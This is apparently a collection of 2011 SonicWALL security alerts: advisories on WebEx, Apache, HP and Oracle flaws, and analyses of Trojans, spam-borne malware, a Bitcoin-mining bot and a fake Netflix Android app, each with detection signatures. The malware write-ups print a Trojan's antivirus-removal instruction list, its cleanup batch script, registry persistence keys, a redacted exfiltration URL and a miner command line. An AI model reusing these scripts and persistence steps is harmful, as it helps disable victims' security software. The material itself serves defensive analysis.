Cisco WebEx Player Remote Code Execution (Dec 8, 2011)

/in /by

WebEx Communications Inc. is a Cisco company that provides on-demand collaboration, online meeting, web conferencing and videoconferencing applications. Its products include Meeting Center, Training Center, Event Center, Support Center, Sales Center, MeetMeNow, PCNow, WebEx AIM Pro Business Edition, WebEx WebOffice, WebEx Connect and WebEx Player.

Cisco WebEx uses the proprietary WRF file format (.wrf extension) to store WebEx meeting recordings on the computer of an on-line meeting attendee. The structure of this file is not publicly documented. Reverse-engineering has identified the following structure as a file header:

 Offset Size Field ----------------------------------------------------- 0x00 4 Magic number = 57 4f 54 46 (WOTF) 0x04 4 Unknown 0x08 4 File size in bytes

After the header, there may be multiple records in the file. The records may have the following format:

 Offset Size Field -------------------------------------------------------------------------------- 0x00 1 Field Type 0x01 4 Size of the record 0x05 m unknown 0xXX 4 Datasize (n) 0xXX n Data

A code execution vulnerability exists in Cisco WebEx Player ATA32.dll module. The vulnerable code trusts the date form the records of the WRF file, and uses them in determining the size and the offset in a source/destination buffer for a memcpy function call, and then overwrites the memory with the data from the file.

A remote unauthenticated attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged on user. If code execution fails, the vulnerable application will terminate abnormally.

SonicWALL UTM team has researched this vulnerability and released the following IPS signature to detect the attacks based on this vulnerability:

  • 7202 Cisco WebEx Player Remote Code Execution

The vulnerability has been referred by CVE as CVE-2011-4004.

Apache HTTPD mod_proxy Security Bypass (Dec 2, 2011)

/in /by

The Apache HTTP Server, commonly referred to as Apache, is web server software notable for playing a key role in the initial growth of the World Wide Web. In 2009 it became the first web server software to surpass the 100 million website milestone. The server is capable of being utilized with many different options and configurations. A wide variety of runtime loadable plug-in modules can be used to extend its functionality.

One of the official plug-in modules is the mod_proxy module. As all other modules, it can be compiled as a separate shared library with a “.so” extension. The purpose of this module is to let Apache HTTP server run as a forward or reverse proxy for FTP, HTTP, and HTTPS. The proxy functionality can be turned on by its relevant configuration directives. And users would typically send an HTTP request to a web server which will then be forwarded to the appropriate backend servers.

HTTP is a request/response protocol commonly used by HTTP Server. HTTP uses Uniform Resource Identifiers (URIs) to locate the web pages. A typical HTTP request with URI is showed be below:

 GET /test/index.html HTTP/1.1 HOST: www.example.com

A policy bypass vulnerability exists in Apache HTTP server. The vulnerability is due to a design weakness in Apache reverse proxy module mod_proxy when configured in a specific manner. The code may fail to sufficiently sanitize the Request-URI in an HTTP request in this case. As a result, the internal web server which should not be accessible to external users will be accessed through the Reverse Proxy server.

SonicWALL UTM team has researched this vulnerability and released the following IPS sigantures:

  • 3105 Apache HTTPD mod_proxy Security Bypass 1
  • 3132 Apache HTTPD mod_proxy Security Bypass 2

The vulnerability has been referred by CVE as CVE-2011-3368.

Trojan uses Rootkit remover tool to disable Anti-virus (Dec 1, 2011)

/in /by

The Sonicwall UTM research team received reports of a new KillAV Trojan in the wild. This Trojan uses a rootkit remover tool called The Avenger. According to the home page of this tool “The Avenger is a fully-scriptable, kernel-level Windows driver designed to remove highly persistent files, registry keys/values, and other drivers protected by entrenched malware”. Ironically, the Trojan uses this anti malware tool to remove files belonging to a variety of well known anti-virus software from vendors such as AVG, Kaspersky and Symantec. Most anti-virus software protects its files from user-mode removal. However, it is very hard to protect such files from kernel-mode attacks.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:DRIVERS10KDESCK.exe [Avenger executable]
  • C:DRIVERS10TDESCK.txt [Avenger file instructions]
  • C:WINDOWSsystem32eihs.txt [Avenger file instructions]
  • C:DRIVERS10WINNTK.exe [Detected as GAV: KillFiles.NEK (Trojan)]
  • C:cleanup.exe [Detected as GAV: Zapchast.M (Trojan)]
  • C:cleanup.bat [Cleanup instructions]
  • C:zip.exe [Zip utility]
  • C:WINDOWSsystem32driverstsfqiza.sys [Avenger kernel-mode driver]

TDESCK.txt contains the following information:

      Folders to delete:
      %ProgramFiles%AVG
      %ProgramFiles%Panda Security
      %ProgramFiles%ESET
      %ProgramFiles%KASPER~1
      %ProgramFiles%Avira
      %ProgramFiles%Softwin
      %ProgramFiles%Grisoft
      %ProgramFiles%NORTON~1
      %ProgramFiles%Microsoft Security Client
      Files to move:
      %ProgramFiles%Alwil SoftwareAvast5AvastUI.exe|%ProgramFiles%Alwil SoftwareAvast5AvastUI.exa
      %ProgramFiles%Alwil SoftwareAvast5AvastSvc.exe|%ProgramFiles%Alwil SoftwareAvast5AvastSvc.exa
      %ProgramFiles%AVAST SoftwareAvastAvastSvc.exe|%ProgramFiles%AVAST SoftwareAvastAvastSvc.exa
      %ProgramFiles%AVAST SoftwareAvastAvastUI.exe|%ProgramFiles%AVAST SoftwareAvastAvastUI.exa

The above information instructs the Avenger software to remove or move files and directories belonging to various anti-virus software.

Upon infection, the following command is run to remove the anti-virus files listed above in TDESCK.txt. This command runs Avenger invisibly without its GUI:

      cmd /c C:DRIVERS10KDESCK.exe /nogui C:DRIVERS10TDESCK.txt

cleanup.bat contains the following information:

      @ECHO OFF
      cd %systemdrive%
      if exist %systemdrive%avengerbackup.zip move /y %systemdrive%avengerbackup.zip "%systemdrive%avengerbackup-%date:/=.%-%time::=.%.zip"
      move /y backup.reg %systemdrive%avenger
      copy /y avenger.txt %systemdrive%avenger
      for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:avenger attrib -r -h -s %%a:avenger* /S /D & zip -r -S -q -m -! -P infected "%systemdrive%avengerbackup.zip" %%a:avenger* -x %systemdrive%avengerbackup*.zip & rmdir %%a:avenger
      del zip.exe
      del cleanup.exe
      del cleanup.bat

The Trojan adds the following keys to the Windows registry to install the Avenger kernel-mode driver and run WINNTK.exe and cleanup.exe after reboot:

  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun Microsoft Windows Debug “C:DRIVERS10WINNTK.exe”
  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce Cleanup “C:cleanup.exe”
  • HKEY_LOCAL_MACHINESystemCurrentControlSetServicesmmjnbxj ImagePath “C:WINDOWSsystem32driverstsfqiza.sys”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmmjnbxj cvva “C:WINDOWSsystem32eihs.txt”

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: KillFiles.NEK (Trojan)
  • GAV: Zapchast.M (Trojan)

UPS Invoice Notification spam campagin (Nov. 23, 2011)

/in /by

With the coming of holiday season, SonicWALL UTM Research team observed the surge in the online threats. Reports of email spam campaign containing malware attachment pretending to be coming from United Parcel Service (UPS) continue to flood email inboxes.

Computer users are advised to take precaution in opening unsolicited emails especially from unknown sender. UPS also hosted this presentation to raise awareness about UPS related scams.

The behavior of this malware is further discussed below:

Subject: United Parcel Service – Invoice is available [random numbers]

Attachment: UPS-Billing-Invoice-Notification-[random numbers].zip

Message Body:

    UPS Billing Center

    This is an automatically generated email. Please do not reply to this email address.

    Dear UPS Customer,

    A new invoice is now available in the UPS Billing Centre.
    Please refer to attached file for more details

    Please visit the UPS Billing Centre to view and pay your invoice.

    Coming Soon!
    Effective January 2012, the UPS Billing Centre can be accessed using your My UPS ID.
    Current UPS Billing Centre users will be prompted to convert to a My UPS ID. Learn more

    Discover more about UPS:
    Visit ups.com
    Explore UPS Freight Services
    Learn About UPS Companies
    Sign Up For Additional Email From UPS
    Read Compass Online

    (c) 2011 United Parcel Service of America, Inc., the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
    For more information on UPS’s privacy practices, refer to the UPS Privacy Policy.
    Please do not reply directly to this e-mail. UPS will not receive any reply message.
    For questions or comments, visit Contact UPS.

    This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
    Privacy Policy
    Contact UPS

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

Files Created:

  • Application DataSomonekpos.exe – copy of original malware – blocked as GAV:Kryptik.VUY
  • Application DataAfisaawqide.myx – data file
  • Application DataAfisaawqide.dat – data file

Harvests email addresses:

  • Microsoft Address Book
  • Internet Browser Cookies

Checks for installed client FTP:

  • FlashFXP
  • GhislerTotal Commander
  • ipswitchws_ftp
  • FarPluginsftphosts
  • Far2Pluginsftphosts
  • martin prikrylwinscp 2sessions
  • ftpwarecoreftpsites
  • smartftpclient 2.0settingsgeneralfavorites

Network Activity:

    DNS Request: nos{removed}n.ru

    Post Request: http://nos{removed}n.ru/become.php

Virtual Machine Detection:

    Key: HKLMSystemCurrentControlSetServicesDiskEnum
    Value: 0
    Data:

    • IDEDiskVMware_Virtual_IDE_Hard_Drive
    • IDEDiskVBOX_HARDDISK

VNC Server Detection:

    Tries to connect to VNC server and waits for the following response:

  • RFB 003.003

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV:Kryptik.VUY (Trojan)

HP Data Protector Information Disclosure (Nov 23, 2011)

/in /by

HP Data Protector Media Operations facilitates tracking and management of storage media, as well as data recovery. It tracks online and offline media such as magnetic tapes. HP Data Protector Media Operations includes an administration GUI which can be installed on multiple hosts allowing several administrators to manage Media Operations.

The communication protocol utilized by the server and its clients is proprietary and not publicly documented. The default communication port for the server is TCP 19813. Messages to the server have have the following structure:

 Offset	Size(bytes)	Description ------- --------------- ---------------------------------------- 0x0000	1 		Opcode 0x0001	3		unknown 0x0004	4		record size (x) 0x0008	4		unknown 0x000C	x		record data

All multi-byte values are represented in big endian byte order. Several records are usually transferred together in a single packet. Sub records are contained in the record data field of a record structure. Records having an Opcode of 0x03, and a size value greater than four, have the following sub record structure:

 Offset	Size(bytes)	Description ------- --------------- -------------------------------- 0x0000	4		Opcode 0x0001	1		record size (y) 0x0004	y		filename

Sub records of the above form are possible file requests, which cause the server to return the contents of the file specified in the filename field. The file path resolves relative to the base directory of the server. This base directory is configurable upon product installation. If the record size of a 0x03 record is of a certain specific value, the request is interpreted as a directory listing request, and the contents of the base directory are returned to the client.

An information disclosure vulnerability exists in HP Data Protector, when handling file requests. The process retrieves the filename and appends it to the base directory without any sanitization. As such, directory traversal sequences can be used to traverse to any file on the filesystem. Consequently, the contents of any file will be returned to the client that initiated the file request. A remote, unauthenticated attacker could exploit this vulnerability to obtain confidential information that could be later utilized to compromise other resources.

SonicWALL has released a generic IPS signature to address this issue. The following signature was released:

  • 7175 – HP Data Protector Media Operations Directory Traversal Attempt.

Ngrbot steals information and mines Bitcoins (Nov 18, 2011)

/in /by

SonicWALL UTM Research team discovered Ngrbot spreading in the wild. The bot steals user information and spreads though malicious links, removable drives, instant messengers and social networks. After initial infection, it downloads additional modules including a Bitcoin mining module. Bitcoin is a form of digital currency and one way of obtaining them is by mining. Mining for Bitcoins is a very computationally expensive process involving lots of hashing, making it time consuming and impractical to mine on a personal computer. The creators of this botnet have found a lucrative alternative to generating Bitcoins by leveraging the CPU cycles of infected machines.

Ngrbot uses misleading filenames with explicit icons as shown below:

screenshot

It performs the following activities:

  • It determines geoip details by sending a request to api.wipmania.com.
  • It contacts a remote C&C server to report infection and receive additional commands.
  • It downloads additional modules from a remote file hosting server.
  • It drops the following files:
    • %AppData%9.exe [Detected as Injector.KSW_2 (Trojan) ]
    • %AppData%A.exe (Corrupted file)
    • %AppData%kakao3fuckHDZSDP.exe [Detected as Ngrbot.GEN_3 (Worm) ]
    • %AppData%kakao3 new.exe [Detected as BtcMiner (Trojan) ]
    • %AppData%Xkagad.exe (Copy of itself) [Detected as Ngrbot.GEN_3 (Worm) ]
    • Start MenuProgramsStartup newmoon17.exe [Detected as Injector.KSW_3 (Trojan) ]

  • It ensures persistence of infection across reboots:
    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun:Xkagad:”%AppData%Xkagad.exe”
    • Creates startup file in Start MenuProgramsStartup newmoon17.exe

  • It has the following information stealing modules:
    • popgrab
    • ftpgrab
    • ffgrab
    • iegrab

  • It has the ability to perform DOS(Denial of Service) attacks.
  • It blocks access to various antivirus and security websites by intercepting DNS.
  • It uses form grabbers to steal credentials from the following URL’s:
      screenshot

  • It has the ability to spread through MSN messenger and removable drives. It also has the ability to post to Bebo, Friendster, Vkontakte, Twitter and Facebook.
  • It attempts to load “nvcuda.dll”(Nvidia CUDA) if present to mine Bitcoins on the GPU(Graphic Processing Unit).
  • It kills all previous Bitcoin mining infections:
      screenshot

  • It mines for Bitcoins at 59 second intervals by executing the following command:
      mine.exe -a 59 -o http://{removed}.org:8332/ -u darksons_crypt -p pt

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Ngrbot.GEN (Worm)
  • GAV: Ngrbot.GEN_3 (Worm)

screenshot

This threat is also classified as “Dorkbot.A (Worm)” by some vendors.

Oracle Hyperion ActiveX BO (Nov 18, 2011)

/in /by

Oracle’s Hyperion is composed of various business performance management and business intelligence software. The Hyperion Financial line of products includes financial reporting and analysis components. Installation of Hyperion Financial on Windows systems will result in the installation of several ActiveX controls, one of which is named TTF16.ocx. This ActiveX control is associated with CLSID B0475003-7740-11D1-BDC3-0020AF9F8E6E, and ProgID TTF161.TTF1.6. The control is marked as scriptable, and as such, can be instantiated via a web page by using the tag or through scripting. The following examples demonstrate example instantiation code snippets:

  Or var ctrl = new ActiveXObject("TTF161.TTF1.6"); 
 The TTF161.TTF1.6 control exposes several methods, one of which is a method named SetDevNames, which is used to set the default printer. An example code snippet illustrating the use of this function is shown:
SetDevNames('drivername', 'devicename', 'port')
 A code execution vulnerability exists in Oracle’s Hyperion Financial TTF161.TTF1.6 ActiveX control. The vulnerability exists because of a heap buffer overflow during execution of the SetDevNames method. The method allocates a heap buffer of size determined by the number of characters in the given attributes. The method then converts the parameters into Unicode strings which results in doubling of their size. The Unicode strings are then copied into the allocated buffer. If any of the three parameters is not an empty string, a heap buffer overflow will occur.
 In order to exploit this vulnerability, the attacker needs to entice the target user to visit a malicious web page. Any code execution resulting from exploitation will occur in the security context of the currently logged-in user. An unsuccessful code execution attempt may result in abnormal termination of the web browser.
 SonicWALL has released an IPS signature that detects and blocks exploitation attempts targeting this vulnerability. The following signature has been released:
  • 7161 – Oracle Hyperion Strategic TTF16 ActiveX Buffer Overflow
 Rejected Federal Tax payment spam campaign (Nov 10, 2011)  
/in  /by 
SonicWALL UTM Research team observed a new spam campaign pretending to be arriving from IRS information center. It informs the user about a rejected Federal Tax payment and asks them to review the attached PDF report file for more information. The attached file is a malicious executable Trojan masquerading as a PDF file.
 A sample e-mail message looks like:
 screenshot
 The attached report file looks like:
 screenshot
 The file if executed will perform following activity:
  • Creates a process svchost.exe and injects code into it.
  • Connects to public Google DNS Server 8.8.4.4 to check for Internet connectivity and sends DNS queries to it for a list of predetermined remote servers:
    • followmego12.ru
    • hidemyfass87111.ru
    • losokorot7621.ru
    • mamtumbochka766.ru
  • Reports the infected machine’s information to one of the above mentioned servers via POST request: 
     screenshot
     The decrypted version of the data being sent looks like “id:8(REMOVED)|bid:X|bv:XXX|sv:XXXX|la:X”
  •  It further attempts to download malicious executable files from a remote server in Latvia:
    •  91.22(REMOVED).29/step.exe [Detected as GAV: Pakes.II_2 (Trojan)]
    •  91.22(REMOVED).29/spm.exe [Detected as GAV: Festi.C_3 (Trojan)]
  •  Drops following files:
    • (All Users Temp)5328ffb60049acd7.exe [Copy of itself detected as GAV: Pakes.QUJ (Trojan)]
    • (User Temp)uhbgmrxgvk.bat [Batch file to remove previous version]
  • Deletes the original copy of the file.
 SonicWALL Gateway AntiVirus provides protection against this threat via following signatures:
  • GAV: Pakes.QUJ (Trojan)
  • GAV: Festi.C_3 (Trojan)
  • GAV: Pakes.II_2 (Trojan)
 Microsoft Security Bulletin Coverage (Oct 11, 2011)  
/in  /by 
SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of October, 2011. A list of issues reported, along with SonicWALL coverage information follows:
 MS11-075 Vulnerability in Microsoft Active Accessibility Could Allow Remote Code Execution (2623699)
  •  CVE-2011-1247 Active Accessibility Insecure Library Loading Vulnerability
     IPS: 5726 – Possible Binary Planting Attempt
 MS11-076 Vulnerability in Windows Media Center Could Allow Remote Code Execution (2604926)
  •  CVE-2011-2009 Media Center Insecure Library Loading Vulnerability
     IPS: 5726 – Possible Binary Planting Attempt
 MS11-077 Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2567053)
  •  CVE-2011-1985 Win32k Null Pointer De-reference Vulnerability
     This is a local vulnerability.
  •  CVE-2011-2002 Win32k TrueType Font Type Translation Vulnerability
     There is no feasible method of detection.
  •  CVE-2011-2003 Font Library File Buffer Overrun Vulnerability
     IPS: 2252 – Malformed OpenType Font 10b
  •  CVE-2011-2011 Win32k Use After Free Vulnerability
     There is no feasible method of detection.
 MS11-078 Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution (2604930)
  •  CVE-2011-1253 Class Inheritance Vulnerability
     GAV: MsApp.Exp.MP.1
 MS11-079 Vulnerabilities in Microsoft Forefront Unified Access Gateway Could Cause Remote Code Execution (2544641)
  •  CVE-2011-1895 ExcelTable Response Splitting XSS Vulnerability
     IPS: 2418 – ExcelTable Code Injection 1
  •  CVE-2011-1896 ExcelTable Reflected XSS Vulnerability
     IPS: 2419 – ExcelTable Code Injection 2
  •  CVE-2011-1897 Default Reflected XSS Vulnerability
     IPS: 2300 – Generic Cross-Site Scripting (XSS) Attempt 24
  •  CVE-2011-1969 Poisoned Cup of Code Execution Vulnerability
     IPS: 2420 – Generic Java Applet Exploit 3
  •  CVE-2011-2012 Null Session Cookie Crash
     IPS: 2258 – Suspicious HTTP Cookie Header 3
 MS11-080 Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799)
  •  CVE-2011-2005  Ancillary Function Driver Elevation of Privilege Vulnerability
     This is a local vulnerability.
 MS11-081 Cumulative Security Update for Internet Explorer (2586448)
  •  CVE-2011-1993 Scroll Event Remote Code Execution Vulnerability
     IPS: 7029 – MS IE Scroll Event Remote Code Execution Exploit
  •  CVE-2011-1995 OLEAuto32.dll Remote Code Execution Vulnerability
     IPS: 7028 – MS IE OLEAuto32.dll Remote Code Execution Exploit
  •  CVE-2011-1996 Option Element Remote Code Execution Vulnerability
     IPS: 7027 – MS IE Option Element Remote Code Execution Exploit
  •  CVE-2011-1997 OnLoad Event Remote Code Execution Vulnerability
     IPS: 7026 – MS IE OnLoad Event Remote Code Execution Exploit
  •  CVE-2011-1998 Jscript9.dll Remote Code Execution Vulnerability
     IPS: 7025 – MS IE Jscript9.dll Remote Code Execution Exploit
  •  CVE-2011-1999 Select Element Remote Code Execution Vulnerability
     IPS: 7024 – MS IE Select Element Remote Code Execution Exploit
  •  CVE-2011-2000 Body Element Remote Code Execution Vulnerability
     IPS: 7022 – MS IE Body Element Remote Code Execution Exploit
  •  CVE-2011-2001 Virtual Function Table Corruption Remote Code Execution Vulnerability
     IPS: 7021 – MS IE Virtual Function Table Corruption Exploit
 MS11-082 Vulnerabilities in Host Integration Server Could Allow Denial of Service (2607670)
  •  CVE-2011-2007 Endless Loop DoS in snabase.exe Vulnerability
     IPS: 5012 – Generic UDP Shellcode Exploit 2
  •  CVE-2011-2008 Access of Unallocated Memory DoS Vulnerability
     IPS: 4896 – Generic Server Application Shellcode Exploit 9
     IPS: 5512 – Generic Server Application Shellcode Exploit 28
     IPS: 6701 – MS Host Integration Server DoS
 Android Malware stealing user information  (Oct 14, 2011)  
/in  /by 
SonicWALL UTM Research team received reports of a new AndroidOS malware Neflic masquerading as Netflix application that steals information from the user and sends it to a remote server. The server has been taken down at the time of writing this alert.
 The malware author, in this case, took advantage of the popularity of Netflix mobile application and lack of availability across all Android OS versions. The malicious application looks very similar to the official Netflix Android application and steals user’s account information before self destroying itself. Below are the screenshots of the malicious Application in action:
 Installation Screen
     screenshot
 Login Screen comparision – Fake (on left) & Real (on right)
     screenshot
 Once the user enters the login credentials, it will send the information to a remote server and generate a fake “Your Android TV is not supported” prompt as seen below:
     screenshot
 Code snippet showing the malicious server (offline now) where the stolen information was being logged:
     screenshot
 SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:
  • GAV: AndroidOS.neflic (Trojan)
  • GAV: AndroidOS.neflic_2 (Trojan)
       
Pin It on Pinterest